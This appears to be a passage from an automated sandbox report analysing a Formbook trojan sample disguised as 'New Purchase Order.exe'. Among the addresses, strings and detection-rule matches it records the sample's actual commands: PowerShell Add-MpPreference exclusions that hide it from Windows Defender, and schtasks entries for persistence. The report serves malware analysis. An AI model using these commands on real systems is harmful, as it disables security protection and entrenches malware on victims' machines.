            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039AF0CC17_2_039AF0CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039B70E917_2_039B70E9
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039BF0E017_2_039BF0E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039BF7B017_2_039BF7B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039B16CC17_2_039B16CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0394563017_2_03945630
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0399D5B017_2_0399D5B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039C95C317_2_039C95C3
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039B757117_2_039B7571
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039BF43F17_2_039BF43F
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038F146017_2_038F1460
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0391FB8017_2_0391FB80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03975BF017_2_03975BF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0393DBF917_2_0393DBF9
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039BFB7617_2_039BFB76
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03945AA017_2_03945AA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0399DAAC17_2_0399DAAC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039A1AA317_2_039A1AA3
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039ADAC617_2_039ADAC6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039BFA4917_2_039BFA49
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039B7A4617_2_039B7A46
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03973A6C17_2_03973A6C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0399591017_2_03995910
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0390995017_2_03909950
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0391B95017_2_0391B950
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039038E017_2_039038E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0396D80017_2_0396D800
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03901F9217_2_03901F92
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039BFFB117_2_039BFFB1
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038C3FD517_2_038C3FD5
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_038C3FD217_2_038C3FD2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039BFF0917_2_039BFF09
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03909EB017_2_03909EB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0391FDC017_2_0391FDC0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039B1D5A17_2_039B1D5A
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03903D4017_2_03903D40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039B7D7317_2_039B7D73
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_039BFCF217_2_039BFCF2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03979C3217_2_03979C32
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E61C4017_2_02E61C40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E5CB8017_2_02E5CB80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E5CB7817_2_02E5CB78
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E5AE2017_2_02E5AE20
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E5CDA017_2_02E5CDA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E652D017_2_02E652D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E634C017_2_02E634C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E634BB17_2_02E634BB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_02E7B8D017_2_02E7B8D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0375E56317_2_0375E563
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0375E44817_2_0375E448
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0375D96817_2_0375D968
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0375E8FC17_2_0375E8FC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 0397F290 appears 103 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 038EB970 appears 262 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 03947E54 appears 107 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 0396EA12 appears 86 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 03935130 appears 58 times
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: String function: 014E7E54 appears 96 times
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeCode function: String function: 0150EA12 appears 36 times
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 011BF290 appears 103 times
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 01175130 appears 58 times
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 011AEA12 appears 86 times
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 01187E54 appears 107 times
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 0112B970 appears 262 times
            Source: New Purchase Order.exe, 00000000.00000002.1694702784.0000000002B61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000000.00000002.1694702784.0000000002BAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000000.00000002.1693627231.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000000.00000002.1696979207.0000000003C5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000000.00000002.1700994980.0000000007280000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000000.00000002.1701251700.00000000075BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOAk.exe@ vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000000.00000002.1700185092.0000000005520000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000008.00000002.1910720585.0000000000C98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSETUPUGC.EXEj% vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000008.00000002.1911207910.000000000122D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Purchase Order.exe
            Source: New Purchase Order.exe, 00000008.00000002.1910720585.0000000000CDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSETUPUGC.EXEj% vs New Purchase Order.exe
            Source: New Purchase Order.exeBinary or memory string: OriginalFilenameLOAk.exe@ vs New Purchase Order.exe
            Source: New Purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: New Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: ibDqDkseW.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, pqSMjOU71QL7efIRAR.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, pqSMjOU71QL7efIRAR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, pqSMjOU71QL7efIRAR.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, wRGX8wQWID9wFOoes1.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, wRGX8wQWID9wFOoes1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, pqSMjOU71QL7efIRAR.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, pqSMjOU71QL7efIRAR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, pqSMjOU71QL7efIRAR.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, wRGX8wQWID9wFOoes1.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, wRGX8wQWID9wFOoes1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, wRGX8wQWID9wFOoes1.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, wRGX8wQWID9wFOoes1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, pqSMjOU71QL7efIRAR.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, pqSMjOU71QL7efIRAR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, pqSMjOU71QL7efIRAR.csSecurity API names: _0020.AddAccessRule
            Source: New Purchase Order.exe, ibDqDkseW.exe.0.drBinary or memory string: *.slnEError processing directory {0} {1}#Deleting file {0}%Modifying file {0}=Unable to Delete file {0}. {1}.tmpWGlobalSection(TeamFoundationVersionControl)!EndGlobalSection
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/16@15/12
            Source: C:\Users\user\Desktop\New Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\ibDqDkseW.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeMutant created: \Sessions\1\BaseNamedObjects\rhwBynzqn
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03
            Source: C:\Users\user\Desktop\New Purchase Order.exeFile created: C:\Users\user\AppData\Local\Temp\tmp83A4.tmpJump to behavior
            Source: New Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: New Purchase Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\New Purchase Order.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: setupugc.exe, 00000011.00000002.4110652800.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2086542672.00000000032FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: New Purchase Order.exeVirustotal: Detection: 30%
            Source: C:\Users\user\Desktop\New Purchase Order.exeFile read: C:\Users\user\Desktop\New Purchase Order.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe C:\Users\user\AppData\Roaming\ibDqDkseW.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeProcess created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"
            Source: C:\Windows\SysWOW64\setupugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"Jump to behavior
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeProcess created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"
            Source: C:\Windows\SysWOW64\setupugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
